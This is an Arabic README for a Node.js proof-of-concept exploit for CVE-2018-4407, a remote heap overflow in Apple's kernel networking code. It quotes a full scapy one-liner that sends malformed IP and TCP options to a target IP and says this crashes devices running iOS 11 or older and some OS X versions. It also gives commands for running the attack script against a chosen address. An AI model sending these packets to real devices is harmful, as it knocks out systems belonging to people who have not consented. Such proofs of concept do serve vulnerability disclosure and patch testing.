
كود استغلال PoC بلغة Node.js لثغرة CVE-2018-4407
كود استغلال Node.js PoC لـ CVE-2018-4407
المؤلف: Sam Decrock
يعتمد هذا السكربت على سكربت scapy الذي قدمه Zuk:
iOS 12 / OS X *ثغرة تجاوز سعة الكومة في النواة عن بُعد (CVE-2018-4407) POC* في تغريدة:
— Zuk (@ihackbanme) 1 نوفمبر 2018
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
يتسبب في تعطل الأجهزة التي تعمل بنظام iOS 11 أو إصدارات أقدم بالإضافة إلى بعض إصدارات OS X.
لتثبيت الوحدات المطلوبة، شغّل:
npm install
للتشغيل، مرر عنوان IP الخاص بالهدف كوسيط:
node attack.js 192.168.1.20
المقال الأصلي بقلم Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407